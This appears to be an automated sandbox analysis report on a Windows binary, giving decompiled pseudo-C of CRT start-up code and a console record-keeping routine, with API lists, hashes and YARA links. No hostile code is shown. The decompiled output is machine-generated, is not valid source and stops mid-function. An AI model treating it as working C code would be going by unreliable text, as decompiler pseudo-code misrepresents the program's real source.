						 *0xa70c08 = _t142;
						while(1) {
							__eflags = _t134 - _t81 + 0x800;
							if(_t134 >= _t81 + 0x800) {
								break;
							}
							 *((short*)(_t134 + 4)) = 0xa00;
							 *_t134 =  *_t134 | 0xffffffff;
							 *(_t134 + 8) = _t130;
							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x00000080;
							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x0000007f;
							 *((short*)(_t134 + 0x25)) = 0xa0a;
							 *(_t134 + 0x38) = _t130;
							 *(_t134 + 0x34) = _t130;
							_t134 = _t134 + 0x40;
							 *(_t156 - 0x24) = _t134;
							_t81 =  *0xa70c20; // 0x0
						}
						GetStartupInfoW(_t156 - 0x74);
						__eflags =  *((short*)(_t156 - 0x42));
						if( *((short*)(_t156 - 0x42)) == 0) {
							while(1) {
								L31:
								 *(_t156 - 0x2c) = _t130;
								__eflags = _t130 - 3;
								if(_t130 >= 3) {
									break;
								}
								_t148 = (_t130 << 6) +  *0xa70c20;
								 *(_t156 - 0x24) = _t148;
								__eflags =  *_t148 - 0xffffffff;
								if( *_t148 == 0xffffffff) {
									L35:
									_t148[1] = 0x81;
									__eflags = _t130;
									if(_t130 != 0) {
										_t66 = _t130 - 1; // -1
										asm("sbb eax, eax");
										_t90 =  ~_t66 + 0xfffffff5;
										__eflags = _t90;
									} else {
										_t90 = 0xfffffff6;
									}
									_t143 = GetStdHandle(_t90);
									__eflags = _t143 - 0xffffffff;
									if(_t143 == 0xffffffff) {
										L47:
										_t148[1] = _t148[1] | 0x00000040;
										 *_t148 = 0xfffffffe;
										_t94 =  *0xa70d44; // 0xb6b598
										__eflags = _t94;
										if(_t94 != 0) {
											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
										}
										goto L49;
									} else {
										__eflags = _t143;
										if(_t143 == 0) {
											goto L47;
										}
										_t98 = GetFileType(_t143);
										__eflags = _t98;
										if(_t98 == 0) {
											goto L47;
										}
										 *_t148 = _t143;
										_t99 = _t98 & 0x000000ff;
										__eflags = _t99 - 2;
										if(_t99 != 2) {
											__eflags = _t99 - 3;
											if(_t99 != 3) {
												L46:
												_t70 =  &(_t148[3]); // -10947604
												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
												_t148[2] = _t148[2] + 1;
												L49:
												_t130 = _t130 + 1;
												continue;
											}
											_t103 = _t148[1] | 0x00000008;
											__eflags = _t103;
											L45:
											_t148[1] = _t103;
											goto L46;
										}
										_t103 = _t148[1] | 0x00000040;
										goto L45;
									}
								}
								__eflags =  *_t148 - 0xfffffffe;
								if( *_t148 == 0xfffffffe) {
									goto L35;
								}
								_t148[1] = _t148[1] | 0x00000080;
								goto L49;
							}
							 *(_t156 - 4) = 0xfffffffe;
							E00A56574();
							L2:
							_t86 = 1;
							L3:
							return E00A554F5(_t86);
						}
						_t105 =  *(_t156 - 0x40);
						__eflags = _t105;
						if(_t105 == 0) {
							goto L31;
						}
						_t135 =  *_t105;
						 *(_t156 - 0x1c) = _t135;
						_t106 = _t105 + 4;
						 *((intOrPtr*)(_t156 - 0x28)) = _t106;
						 *(_t156 - 0x20) = _t106 + _t135;
						__eflags = _t135 - 0x800;
						if(_t135 >= 0x800) {
							_t135 = 0x800;
							 *(_t156 - 0x1c) = 0x800;
						}
						_t150 = 1;
						__eflags = 1;
						 *(_t156 - 0x30) = 1;
						while(1) {
							__eflags =  *0xa70c08 - _t135; // 0x3
							if(__eflags >= 0) {
								break;
							}
							_t138 = E00A54E6A(_t142, 0x40);
							 *(_t156 - 0x24) = _t138;
							__eflags = _t138;
							if(_t138 != 0) {
								0xa70c20[_t150] = _t138;
								 *0xa70c08 =  *0xa70c08 + _t142;
								__eflags =  *0xa70c08;
								while(1) {
									__eflags = _t138 - 0xa70c20[_t150] + 0x800;
									if(_t138 >= 0xa70c20[_t150] + 0x800) {
										break;
									}
									 *((short*)(_t138 + 4)) = 0xa00;
									 *_t138 =  *_t138 | 0xffffffff;
									 *(_t138 + 8) = _t130;
									 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
									 *((short*)(_t138 + 0x25)) = 0xa0a;
									 *(_t138 + 0x38) = _t130;
									 *(_t138 + 0x34) = _t130;
									_t138 = _t138 + 0x40;
									 *(_t156 - 0x24) = _t138;
								}
								_t150 = _t150 + 1;
								 *(_t156 - 0x30) = _t150;
								_t135 =  *(_t156 - 0x1c);
								continue;
							}
							_t135 =  *0xa70c08; // 0x3
							 *(_t156 - 0x1c) = _t135;
							break;
						}
						_t144 = _t130;
						 *(_t156 - 0x2c) = _t144;
						_t109 =  *((intOrPtr*)(_t156 - 0x28));
						_t140 =  *(_t156 - 0x20);
						while(1) {
							__eflags = _t144 - _t135;
							if(_t144 >= _t135) {
								goto L31;
							}
							_t151 =  *_t140;
							__eflags = _t151 - 0xffffffff;
							if(_t151 == 0xffffffff) {
								L26:
								_t144 = _t144 + 1;
								 *(_t156 - 0x2c) = _t144;
								_t109 =  *((intOrPtr*)(_t156 - 0x28)) + 1;
								 *((intOrPtr*)(_t156 - 0x28)) = _t109;
								_t140 =  &(_t140[1]);
								 *(_t156 - 0x20) = _t140;
								continue;
							}
							__eflags = _t151 - 0xfffffffe;
							if(_t151 == 0xfffffffe) {
								goto L26;
							}
							_t111 =  *_t109;
							__eflags = _t111 & 0x00000001;
							if((_t111 & 0x00000001) == 0) {
								goto L26;
							}
							__eflags = _t111 & 0x00000008;
							if((_t111 & 0x00000008) != 0) {
								L24:
								_t155 = ((_t144 & 0x0000001f) << 6) + 0xa70c20[_t144 >> 5];
								 *(_t156 - 0x24) = _t155;
								 *_t155 =  *_t140;
								 *((char*)(_t155 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t156 - 0x28))));
								_t38 = _t155 + 0xc; // 0xd
								InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
								_t39 = _t155 + 8;
								 *_t39 =  *(_t155 + 8) + 1;
								__eflags =  *_t39;
								_t140 =  *(_t156 - 0x20);
								L25:
								_t135 =  *(_t156 - 0x1c);
								goto L26;
							}
							_t119 = GetFileType(_t151);
							_t140 =  *(_t156 - 0x20);
							__eflags = _t119;
							if(_t119 == 0) {
								goto L25;
							}
							goto L24;
						}
						goto L31;
					}
					E00A56960(_t156, 0xa6f360, _t156 - 0x10, 0xfffffffe);
					_t86 = 0;
					goto L3;
				}
				E00A56960(_t156, 0xa6f360, _t156 - 0x10, 0xfffffffe);
				goto L2;
			}





























                                                        0x00a562b0
                                                        0x00a562b2
                                                        0x00a562b7
                                                        0x00a562be
                                                        0x00a562c4
                                                        0x00a562c6
                                                        0x00a562c9
                                                        0x00a562cf
                                                        0x00a562ef
                                                        0x00a562f3
                                                        0x00a562f4
                                                        0x00a562f5
                                                        0x00a562fc
                                                        0x00a562fe
                                                        0x00a56301
                                                        0x00a56303
                                                        0x00a5631c
                                                        0x00a56321
                                                        0x00a56327
                                                        0x00a5632c
                                                        0x00a5632e
                                                        0x00000000
                                                        0x00000000
                                                        0x00a56330
                                                        0x00a56336
                                                        0x00a56339
                                                        0x00a5633c
                                                        0x00a56345
                                                        0x00a56348
                                                        0x00a5634e
                                                        0x00a56351
                                                        0x00a56354
                                                        0x00a56357
                                                        0x00a5635a
                                                        0x00a5635a
                                                        0x00a56365
                                                        0x00a5636b
                                                        0x00a56370
                                                        0x00a5649f
                                                        0x00a5649f
                                                        0x00a5649f
                                                        0x00a564a2
                                                        0x00a564a5
                                                        0x00000000
                                                        0x00000000
                                                        0x00a564b0
                                                        0x00a564b6
                                                        0x00a564b9
                                                        0x00a564bc
                                                        0x00a564d1
                                                        0x00a564d1
                                                        0x00a564d5
                                                        0x00a564d7
                                                        0x00a564de
                                                        0x00a564e3
                                                        0x00a564e5
                                                        0x00a564e5
                                                        0x00a564d9
                                                        0x00a564db
                                                        0x00a564db
                                                        0x00a564ef
                                                        0x00a564f1
                                                        0x00a564f4
                                                        0x00a5653b
                                                        0x00a56541
                                                        0x00a56544
                                                        0x00a5654a
                                                        0x00a5654f
                                                        0x00a56551
                                                        0x00a56556
                                                        0x00a56556
                                                        0x00000000
                                                        0x00a564f6
                                                        0x00a564f6
                                                        0x00a564f8
                                                        0x00000000
                                                        0x00000000
                                                        0x00a564fb
                                                        0x00a56501
                                                        0x00a56503
                                                        0x00000000
                                                        0x00000000
                                                        0x00a56505
                                                        0x00a56507
                                                        0x00a5650c
                                                        0x00a5650f
                                                        0x00a56519
                                                        0x00a5651c
                                                        0x00a56527
                                                        0x00a5652c
                                                        0x00a56530
                                                        0x00a56536
                                                        0x00a5655d
                                                        0x00a5655d
                                                        0x00000000
                                                        0x00a5655d
                                                        0x00a56522
                                                        0x00a56522
                                                        0x00a56524
                                                        0x00a56524
                                                        0x00000000
                                                        0x00a56524
                                                        0x00a56515
                                                        0x00000000
                                                        0x00a56515
                                                        0x00a564f4
                                                        0x00a564be
                                                        0x00a564c1
                                                        0x00000000
                                                        0x00000000
                                                        0x00a564c9
                                                        0x00000000
                                                        0x00a564c9
                                                        0x00a56563
                                                        0x00a5656a
                                                        0x00a562e4
                                                        0x00a562e6
                                                        0x00a562e7
                                                        0x00a562ec
                                                        0x00a562ec
                                                        0x00a56376
                                                        0x00a56379
                                                        0x00a5637b
                                                        0x00000000
                                                        0x00000000
                                                        0x00a56381
                                                        0x00a56383
                                                        0x00a56386
                                                        0x00a56389
                                                        0x00a5638e
                                                        0x00a56396
                                                        0x00a56398
                                                        0x00a5639a
                                                        0x00a5639c
                                                        0x00a5639c
                                                        0x00a563a1
                                                        0x00a563a1
                                                        0x00a563a2
                                                        0x00a563a5
                                                        0x00a563a5
                                                        0x00a563ab
                                                        0x00000000
                                                        0x00000000
                                                        0x00a563b7
                                                        0x00a563b9
                                                        0x00a563bc
                                                        0x00a563be
                                                        0x00a56452
                                                        0x00a56459
                                                        0x00a56459
                                                        0x00a5645f
                                                        0x00a5646b
                                                        0x00a5646d
                                                        0x00000000
                                                        0x00000000
                                                        0x00a5646f
                                                        0x00a56475
                                                        0x00a56478
                                                        0x00a5647b
                                                        0x00a5647f
                                                        0x00a56485
                                                        0x00a56488
                                                        0x00a5648b
                                                        0x00a5648e
                                                        0x00a5648e
                                                        0x00a56493
                                                        0x00a56494
                                                        0x00a56497
                                                        0x00000000
                                                        0x00a56497
                                                        0x00a563c4
                                                        0x00a563ca
                                                        0x00000000
                                                        0x00a563ca
                                                        0x00a563cd
                                                        0x00a563cf
                                                        0x00a563d2
                                                        0x00a563d5
                                                        0x00a563d8
                                                        0x00a563d8
                                                        0x00a563da
                                                        0x00000000
                                                        0x00000000
                                                        0x00a563e0
                                                        0x00a563e2
                                                        0x00a563e5
                                                        0x00a5643f
                                                        0x00a5643f
                                                        0x00a56440
                                                        0x00a56446
                                                        0x00a56447
                                                        0x00a5644a
                                                        0x00a5644d
                                                        0x00000000
                                                        0x00a5644d
                                                        0x00a563e7
                                                        0x00a563ea
                                                        0x00000000
                                                        0x00000000
                                                        0x00a563ec
                                                        0x00a563ee
                                                        0x00a563f0
                                                        0x00000000
                                                        0x00000000
                                                        0x00a563f2
                                                        0x00a563f4
                                                        0x00a56404
                                                        0x00a56411
                                                        0x00a56418
                                                        0x00a5641d
                                                        0x00a56424
                                                        0x00a5642c
                                                        0x00a56430
                                                        0x00a56436
                                                        0x00a56436
                                                        0x00a56436
                                                        0x00a56439
                                                        0x00a5643c
                                                        0x00a5643c
                                                        0x00000000
                                                        0x00a5643c
                                                        0x00a563f7
                                                        0x00a563fd
                                                        0x00a56400
                                                        0x00a56402
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a56402
                                                        0x00000000
                                                        0x00a563d8
                                                        0x00a56310
                                                        0x00a56318
                                                        0x00000000
                                                        0x00a56318
                                                        0x00a562dc
                                                        0x00000000

                                                        APIs
                                                        • __lock.LIBCMT ref: 00A562BE
                                                          • Part of subcall function 00A54C99: __mtinitlocknum.LIBCMT ref: 00A54CAB
                                                          • Part of subcall function 00A54C99: __amsg_exit.LIBCMT ref: 00A54CB7
                                                          • Part of subcall function 00A54C99: EnterCriticalSection.KERNEL32(?,?,00A5C53F,0000000D), ref: 00A54CC4
                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00A562DC
                                                        • __calloc_crt.LIBCMT ref: 00A562F5
                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00A56310
                                                        • GetStartupInfoW.KERNEL32(?,00A6D008,00000064), ref: 00A56365
                                                        • __calloc_crt.LIBCMT ref: 00A563B0
                                                        • GetFileType.KERNEL32(00000001), ref: 00A563F7
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00A56430
                                                        • GetStdHandle.KERNEL32(-000000F6), ref: 00A564E9
                                                        • GetFileType.KERNEL32(00000000), ref: 00A564FB
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(-00A70C14,00000FA0), ref: 00A56530
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__amsg_exit__lock__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 301580142-0
                                                        • Opcode ID: 4e1eb4c55fefa4f096dd381db50b40c95b9f927011b1bf8a0d43eb71d69deb40
                                                        • Instruction ID: acfd3b4e4e1fb06ce92fda090962ca0b3d1c93f3f0da3b7cac3ffe7732306b9d
                                                        • Opcode Fuzzy Hash: 4e1eb4c55fefa4f096dd381db50b40c95b9f927011b1bf8a0d43eb71d69deb40
                                                        • Instruction Fuzzy Hash: E991D071904355CFCB10CFA8D9805ADBBF0BF1A325B64826ED8AAAB3D1D7349847CB14
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A51BC0, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 169COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 84%
                                                        			E00A51BC0(void* __ebx, char* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v24;
				char _v36;
				char _v608;
				char _v609;
				intOrPtr _v616;
				char _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				void* __ebp;
				signed int _t38;
				intOrPtr _t51;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t67;
				void* _t71;
				intOrPtr _t79;
				signed int _t108;
				void* _t109;
				void* _t110;
				void* _t113;
				void* _t118;
				void* _t119;
				void* _t121;
				void* _t122;

				_t107 = __esi;
				_t106 = __edi;
				_t99 = __edx;
				_t83 = __ebx;
				_t38 =  *0xa6f360; // 0x51accb5
				_v8 = _t38 ^ _t108;
				_v609 = 0x59;
				E00A5401F(__ebx, __edx, __edi, __eflags, "cls");
				_t110 = _t109 + 4;
				_v632 = E00A51000(__ebx, __edi, __esi);
				if(_v632 != 1) {
					while(1) {
						__eflags = _v609 - 0x59;
						if(__eflags != 0) {
							break;
						} else {
							goto L3;
						}
						do {
							do {
								L3:
								E00A53A3A(0xa6f034,  &_v620);
								_t110 = _t110 + 8;
								_v628 = _v620;
								__eflags = _v628 - 1;
								if(__eflags == 0) {
									_push(E00A5283E());
									E00A52AB0(_t83, _t106, _t107, __eflags);
									_t99 =  &_v24;
									E00A5359B( &_v24);
									_t51 = E00A52DAF( &_v24, 0xa6f038);
									_t113 = _t110 + 0x10;
									_v616 = _t51;
									__eflags = _v616;
									if(__eflags != 0) {
										_push(_v616);
										E00A52986(_t83, _t106, _t107, __eflags);
										E00A53839( &_v24);
										_t110 = _t113 + 8;
										goto L19;
									} else {
										E00A6945E(_t83,  &_v24, _t106, _t107, __eflags);
									}
								} else {
									__eflags = _v628 - 2;
									if(__eflags == 0) {
										_push(E00A5283E());
										E00A52AB0(_t83, _t106, _t107, __eflags);
										_t99 =  &_v24;
										E00A5359B( &_v24);
										_t64 = E00A52DAF( &_v24, 0xa6f03c);
										_t118 = _t110 + 0x10;
										_v616 = _t64;
										__eflags = _v616;
										if(__eflags != 0) {
											_t65 = E00A52DAF("temp", 0xa6f040);
											_t119 = _t118 + 8;
											_v624 = _t65;
											__eflags = _v624;
											if(__eflags != 0) {
												_t67 = E00A5283E();
												__eflags = _t67;
												_push(_t67);
												E00A52AB0(_t83, _t106, _t107, _t67);
												E00A5359B( &_v36);
												_t121 = _t119 + 8;
												while(1) {
													_t71 = E00A52FE7( &_v608, 0x23b, 1, _v616);
													_t122 = _t121 + 0x10;
													__eflags = _t71 - 1;
													if(__eflags != 0) {
														break;
													}
													_t79 = E00A54850( &_v608,  &_v36);
													_t121 = _t122 + 8;
													__eflags = _t79;
													if(__eflags != 0) {
														_push(_v624);
														_push(1);
														_push(0x23b);
														_push( &_v608);
														E00A532F8(_t83,  &_v608, _t106, _t107, __eflags);
														_t121 = _t121 + 0x10;
													}
												}
												_push(_v616);
												E00A52986(_t83, _t106, _t107, __eflags);
												_push(_v624);
												E00A52986(_t83, _t106, _t107, __eflags);
												E00A53839( &_v24);
												E00A53879(__eflags, "temp",  &_v24);
												_t110 = _t122 + 0x14;
												goto L19;
											} else {
												E00A6945E(_t83,  &_v24, _t106, _t107, __eflags);
											}
										} else {
											E00A6945E(_t83,  &_v24, _t106, _t107, __eflags);
										}
									} else {
										goto L19;
									}
								}
								goto L23;
								L19:
								__eflags = _v620 - 1;
							} while (_v620 < 1);
							__eflags = _v620 - 2;
						} while (__eflags > 0);
						_push(E00A5283E());
						E00A52AB0(_t83, _t106, _t107, __eflags);
						_t99 =  &_v609;
						E00A53A3A(0xa6f054,  &_v609);
						_t110 = _t110 + 0xc;
					}
					E00A6945E(_t83, _t99, _t106, _t107, __eflags);
				} else {
				}
				L23:
				return E00A548DC(_t83, _v8 ^ _t108, _t99, _t106, _t107);
			}





























                                                        0x00a51bc0
                                                        0x00a51bc0
                                                        0x00a51bc0
                                                        0x00a51bc0
                                                        0x00a51bc9
                                                        0x00a51bd0
                                                        0x00a51bd3
                                                        0x00a51bdf
                                                        0x00a51be4
                                                        0x00a51bec
                                                        0x00a51bf9
                                                        0x00a51c00
                                                        0x00a51c07
                                                        0x00a51c0a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a51c10
                                                        0x00a51c10
                                                        0x00a51c10
                                                        0x00a51c1c
                                                        0x00a51c21
                                                        0x00a51c2a
                                                        0x00a51c30
                                                        0x00a51c37
                                                        0x00a51c56
                                                        0x00a51c57
                                                        0x00a51c5f
                                                        0x00a51c63
                                                        0x00a51c74
                                                        0x00a51c79
                                                        0x00a51c7c
                                                        0x00a51c82
                                                        0x00a51c89
                                                        0x00a51c9b
                                                        0x00a51c9c
                                                        0x00a51ca8
                                                        0x00a51cad
                                                        0x00000000
                                                        0x00a51c8b
                                                        0x00a51c8b
                                                        0x00a51c8b
                                                        0x00a51c39
                                                        0x00a51c39
                                                        0x00a51c40
                                                        0x00a51cc4
                                                        0x00a51cc5
                                                        0x00a51ccd
                                                        0x00a51cd1
                                                        0x00a51ce2
                                                        0x00a51ce7
                                                        0x00a51cea
                                                        0x00a51cf0
                                                        0x00a51cf7
                                                        0x00a51d0d
                                                        0x00a51d12
                                                        0x00a51d15
                                                        0x00a51d1b
                                                        0x00a51d22
                                                        0x00a51d3b
                                                        0x00a51d3b
                                                        0x00a51d3d
                                                        0x00a51d3e
                                                        0x00a51d4a
                                                        0x00a51d4f
                                                        0x00a51d52
                                                        0x00a51d67
                                                        0x00a51d6c
                                                        0x00a51d6f
                                                        0x00a51d72
                                                        0x00000000
                                                        0x00000000
                                                        0x00a51d7f
                                                        0x00a51d84
                                                        0x00a51d87
                                                        0x00a51d89
                                                        0x00a51d91
                                                        0x00a51d92
                                                        0x00a51d94
                                                        0x00a51d9f
                                                        0x00a51da0
                                                        0x00a51da5
                                                        0x00a51da5
                                                        0x00a51da8
                                                        0x00a51db0
                                                        0x00a51db1
                                                        0x00a51dbf
                                                        0x00a51dc0
                                                        0x00a51dcc
                                                        0x00a51ddd
                                                        0x00a51de2
                                                        0x00000000
                                                        0x00a51d24
                                                        0x00a51d24
                                                        0x00a51d24
                                                        0x00a51cf9
                                                        0x00a51cf9
                                                        0x00a51cf9
                                                        0x00a51c42
                                                        0x00000000
                                                        0x00a51c42
                                                        0x00a51c40
                                                        0x00000000
                                                        0x00a51de5
                                                        0x00a51de5
                                                        0x00a51de5
                                                        0x00a51df2
                                                        0x00a51df2
                                                        0x00a51e0e
                                                        0x00a51e0f
                                                        0x00a51e17
                                                        0x00a51e23
                                                        0x00a51e28
                                                        0x00a51e28
                                                        0x00a51e30
                                                        0x00000000
                                                        0x00a51bfb
                                                        0x00a51e35
                                                        0x00a51e42

                                                        APIs
                                                        • __wsystem.LIBCMT ref: 00A51BDF
                                                          • Part of subcall function 00A5401F: __wdupenv_s.LIBCMT ref: 00A54038
                                                          • Part of subcall function 00A5401F: _free.LIBCMT ref: 00A540E7
                                                        • _wscanf.LIBCMT ref: 00A51C1C
                                                        • _wscanf.LIBCMT ref: 00A51E23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: _wscanf$__wdupenv_s__wsystem_free
                                                        • String ID: Y$cls$temp$temp
                                                        • API String ID: 363616629-2394343624
                                                        • Opcode ID: b0e8f0d9df302761c8efcb7e83b8e095e4dc467e40e6076def77c70c9da9247a
                                                        • Instruction ID: 6fc8f7df914b9807758dad22eb4c12719beaafbb87fd5d9e026ef8db26289a35
                                                        • Opcode Fuzzy Hash: b0e8f0d9df302761c8efcb7e83b8e095e4dc467e40e6076def77c70c9da9247a
                                                        • Instruction Fuzzy Hash: BB51B7B2D04218AADF24F7A09E4BBBE72347B55342F4405A8FD09A5242F7765B4CCB52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A51400, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 122COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 88%
                                                        			E00A51400(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v16;
				char _v32;
				char _v604;
				char _v605;
				intOrPtr _v612;
				intOrPtr _v616;
				char _v620;
				void* __ebp;
				signed int _t25;
				intOrPtr _t35;
				void* _t39;
				intOrPtr _t49;
				void* _t53;
				signed int _t78;
				void* _t79;
				void* _t80;
				void* _t83;
				void* _t85;
				void* _t89;

				_t77 = __esi;
				_t76 = __edi;
				_t58 = __ebx;
				_t25 =  *0xa6f360; // 0x51accb5
				_v8 = _t25 ^ _t78;
				E00A5401F(__ebx, __edx, __edi, __eflags, "cls");
				_t80 = _t79 + 4;
				_v605 = E00A51000(__ebx, __edi, __esi);
				if(_v605 == 0) {
					while(1) {
						_push(E00A5283E());
						E00A52AB0(_t58, _t76, _t77, __eflags);
						_t69 =  &_v32;
						E00A5359B( &_v32);
						_t35 = E00A52DAF( &_v32, "rb");
						_t83 = _t80 + 0x10;
						_v612 = _t35;
						__eflags = _v612;
						if(__eflags == 0) {
							break;
						}
						E00A5401F(_t58,  &_v32, _t76, __eflags, "cls");
						E00A53A3A(0xa6f0c8,  &_v620);
						_t85 = _t83 + 0xc;
						_v616 = _v620;
						__eflags = _v616 - 1;
						if(_v616 == 1) {
							while(1) {
								_t39 = E00A52FE7( &_v604, 0x23b, 1, _v612);
								_t85 = _t85 + 0x10;
								__eflags = _t39 - 1;
								if(__eflags != 0) {
									break;
								}
							}
						} else {
							__eflags = _v616 - 2;
							if(__eflags == 0) {
								_t49 = E00A5283E();
								__eflags = _t49;
								_push(_t49);
								E00A52AB0(_t58, _t76, _t77, _t49);
								E00A5359B( &_v16);
								_t89 = _t85 + 8;
								while(1) {
									_t53 = E00A52FE7( &_v604, 0x23b, 1, _v612);
									_t85 = _t89 + 0x10;
									__eflags = _t53 - 1;
									if(__eflags != 0) {
										goto L13;
									}
									E00A54850( &_v604,  &_v16);
									_t89 = _t85 + 8;
								}
							} else {
							}
						}
						L13:
						_push(E00A5283E());
						E00A52AB0(_t58, _t76, _t77, __eflags);
						E00A53A3A(0xa6f0cc,  &_v605);
						_t80 = _t85 + 0xc;
						__eflags = _v605 - 0x59;
						if(__eflags == 0) {
							continue;
						} else {
							_t69 = _v605;
							__eflags = _v605 - 0x79;
							if(__eflags == 0) {
								continue;
							} else {
								_push(_v612);
								E00A52986(_t58, _t76, _t77, __eflags);
							}
						}
						goto L16;
					}
					_push("\nTHE RECORD DOES NOT EXIST...\n");
					E00A536CE(_t58, _t76, _t77, __eflags);
					E00A6945E(_t58,  &_v32, _t76, _t77, __eflags);
				} else {
				}
				L16:
				return E00A548DC(_t58, _v8 ^ _t78, _t69, _t76, _t77);
			}























                                                        0x00a51400
                                                        0x00a51400
                                                        0x00a51400
                                                        0x00a51409
                                                        0x00a51410
                                                        0x00a51418
                                                        0x00a5141d
                                                        0x00a51425
                                                        0x00a51434
                                                        0x00a5143b
                                                        0x00a5144a
                                                        0x00a5144b
                                                        0x00a51453
                                                        0x00a51457
                                                        0x00a51468
                                                        0x00a5146d
                                                        0x00a51470
                                                        0x00a51476
                                                        0x00a5147d
                                                        0x00000000
                                                        0x00000000
                                                        0x00a5149b
                                                        0x00a514af
                                                        0x00a514b4
                                                        0x00a514bd
                                                        0x00a514c3
                                                        0x00a514ca
                                                        0x00a514da
                                                        0x00a514ef
                                                        0x00a514f4
                                                        0x00a514f7
                                                        0x00a514fa
                                                        0x00000000
                                                        0x00000000
                                                        0x00a514fc
                                                        0x00a514cc
                                                        0x00a514cc
                                                        0x00a514d3
                                                        0x00a5150d
                                                        0x00a5150d
                                                        0x00a5150f
                                                        0x00a51510
                                                        0x00a5151c
                                                        0x00a51521
                                                        0x00a51524
                                                        0x00a51539
                                                        0x00a5153e
                                                        0x00a51541
                                                        0x00a51544
                                                        0x00000000
                                                        0x00000000
                                                        0x00a51551
                                                        0x00a51556
                                                        0x00a51556
                                                        0x00000000
                                                        0x00a514d5
                                                        0x00a514d3
                                                        0x00a5155b
                                                        0x00a5156a
                                                        0x00a5156b
                                                        0x00a5157f
                                                        0x00a51584
                                                        0x00a5158e
                                                        0x00a51591
                                                        0x00000000
                                                        0x00a51597
                                                        0x00a51597
                                                        0x00a5159e
                                                        0x00a515a1
                                                        0x00000000
                                                        0x00a515a7
                                                        0x00a515ad
                                                        0x00a515ae
                                                        0x00a515b3
                                                        0x00a515a1
                                                        0x00000000
                                                        0x00a51591
                                                        0x00a5147f
                                                        0x00a51484
                                                        0x00a5148c
                                                        0x00000000
                                                        0x00a51436
                                                        0x00a515b6
                                                        0x00a515c3

                                                        APIs
                                                        • __wsystem.LIBCMT ref: 00A51418
                                                          • Part of subcall function 00A5401F: __wdupenv_s.LIBCMT ref: 00A54038
                                                          • Part of subcall function 00A5401F: _free.LIBCMT ref: 00A540E7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: __wdupenv_s__wsystem_free
                                                        • String ID: THE RECORD DOES NOT EXIST...$cls$cls
                                                        • API String ID: 1469334009-1515087706
                                                        • Opcode ID: 5e09f5825bfa08a017246e59fc9da2805bfe67c54c66b7bcba71409e4775b4c1
                                                        • Instruction ID: afff99667e6ac316f23889669cdbab27d06f0ab945c8941d403a21d6cb3b0063
                                                        • Opcode Fuzzy Hash: 5e09f5825bfa08a017246e59fc9da2805bfe67c54c66b7bcba71409e4775b4c1
                                                        • Instruction Fuzzy Hash: 3941DAF2D042186EDB24E7A09D4B7BE72357B91302F4445A5FD0655242FA329B8CC752
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A629DA, Relevance: 15.1, APIs: 10, Instructions: 131COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 84%
                                                        			E00A629DA(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
				signed int _v8;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _t38;
				signed int _t45;
				signed int _t60;
				intOrPtr _t77;
				void* _t80;
				intOrPtr* _t82;
				signed int _t83;
				signed int _t86;
				intOrPtr _t88;
				void* _t92;

				_t80 = __edx;
				_push(__ebx);
				_push(__esi);
				_t86 = 0;
				if(_a12 <= 0) {
					L5:
					return _t38;
				} else {
					_push(__edi);
					_t82 =  &_a12;
					while(1) {
